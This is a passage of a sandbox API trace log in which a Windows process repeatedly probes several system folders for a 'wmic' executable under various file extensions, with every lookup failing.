ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.407] SetErrorMode (uMode=0x1) returned 0x1 [0253.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.407] SetErrorMode (uMode=0x1) returned 0x1 [0253.407] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.408] SetErrorMode (uMode=0x1) returned 0x1 [0253.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.408] SetErrorMode (uMode=0x1) returned 0x1 [0253.409] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.409] SetErrorMode (uMode=0x1) returned 0x1 [0253.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.409] SetErrorMode (uMode=0x1) returned 0x1 [0253.409] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.410] SetErrorMode (uMode=0x1) returned 0x1 [0253.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.410] SetErrorMode (uMode=0x1) returned 0x1 [0253.410] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.410] SetErrorMode (uMode=0x1) returned 0x1 [0253.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.411] SetErrorMode (uMode=0x1) returned 0x1 [0253.411] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.411] SetErrorMode (uMode=0x1) returned 0x1 [0253.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.412] SetErrorMode (uMode=0x1) returned 0x1 [0253.412] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.412] SetErrorMode (uMode=0x1) returned 0x1 [0253.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.412] SetErrorMode (uMode=0x1) returned 0x1 [0253.413] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.413] SetErrorMode (uMode=0x1) returned 0x1 [0253.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.413] SetErrorMode (uMode=0x1) returned 0x1 [0253.413] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.414] SetErrorMode (uMode=0x1) returned 0x1 [0253.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.414] SetErrorMode (uMode=0x1) returned 0x1 [0253.414] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.415] SetErrorMode (uMode=0x1) returned 0x1 [0253.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.415] SetErrorMode (uMode=0x1) returned 0x1 [0253.415] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.415] SetErrorMode (uMode=0x1) returned 0x1 [0253.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.416] SetErrorMode (uMode=0x1) returned 0x1 [0253.416] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.416] SetErrorMode (uMode=0x1) returned 0x1 [0253.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.417] SetErrorMode (uMode=0x1) returned 0x1 [0253.417] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.417] SetErrorMode (uMode=0x1) returned 0x1 [0253.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.417] SetErrorMode (uMode=0x1) returned 0x1 [0253.417] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.418] SetErrorMode (uMode=0x1) returned 0x1 [0253.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0253.418] SetErrorMode (uMode=0x1) returned 0x1 [0253.418] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.422] SetErrorMode (uMode=0x1) returned 0x1 [0253.422] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.422] SetErrorMode (uMode=0x1) returned 0x1 [0253.422] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.422] SetErrorMode (uMode=0x1) returned 0x1 [0253.423] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.423] SetErrorMode (uMode=0x1) returned 0x1 [0253.423] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.423] SetErrorMode (uMode=0x1) returned 0x1 [0253.423] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.424] SetErrorMode (uMode=0x1) returned 0x1 [0253.424] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.424] SetErrorMode (uMode=0x1) returned 0x1 [0253.424] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.425] SetErrorMode (uMode=0x1) returned 0x1 [0253.425] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.425] SetErrorMode (uMode=0x1) returned 0x1 [0253.425] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.425] SetErrorMode (uMode=0x1) returned 0x1 [0253.425] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.426] SetErrorMode (uMode=0x1) returned 0x1 [0253.426] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.426] SetErrorMode (uMode=0x1) returned 0x1 [0253.426] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.427] SetErrorMode (uMode=0x1) returned 0x1 [0253.427] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.427] SetErrorMode (uMode=0x1) returned 0x1 [0253.427] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.427] SetErrorMode (uMode=0x1) returned 0x1 [0253.428] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.428] SetErrorMode (uMode=0x1) returned 0x1 [0253.428] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.428] SetErrorMode (uMode=0x1) returned 0x1 [0253.444] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.444] SetErrorMode (uMode=0x1) returned 0x1 [0253.444] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.445] SetErrorMode (uMode=0x1) returned 0x1 [0253.445] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.445] SetErrorMode (uMode=0x1) returned 0x1 [0253.445] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.446] SetErrorMode (uMode=0x1) returned 0x1 [0253.446] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.446] SetErrorMode (uMode=0x1) returned 0x1 [0253.446] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.447] SetErrorMode (uMode=0x1) returned 0x1 [0253.447] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.447] SetErrorMode (uMode=0x1) returned 0x1 [0253.447] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.447] SetErrorMode (uMode=0x1) returned 0x1 [0253.448] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.448] SetErrorMode (uMode=0x1) returned 0x1 [0253.448] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.448] SetErrorMode (uMode=0x1) returned 0x1 [0253.448] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.449] SetErrorMode (uMode=0x1) returned 0x1 [0253.449] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.449] SetErrorMode (uMode=0x1) returned 0x1 [0253.449] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0253.449] SetErrorMode (uMode=0x1) returned 0x1 [0253.449] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.450] SetErrorMode (uMode=0x1) returned 0x1 [0253.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0253.450] SetErrorMode (uMode=0x1) returned 0x1 [0253.450] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.451] SetErrorMode (uMode=0x1) returned 0x1 [0253.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0253.451] SetErrorMode (uMode=0x1) returned 0x1 [0253.451] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c88d380 | out: lpFindFileData=0x1c88d380*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0253.451] SetErrorMode (uMode=0x1) returned 0x1 [0253.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c88d1e0, lpFilePart=0x0 | out: 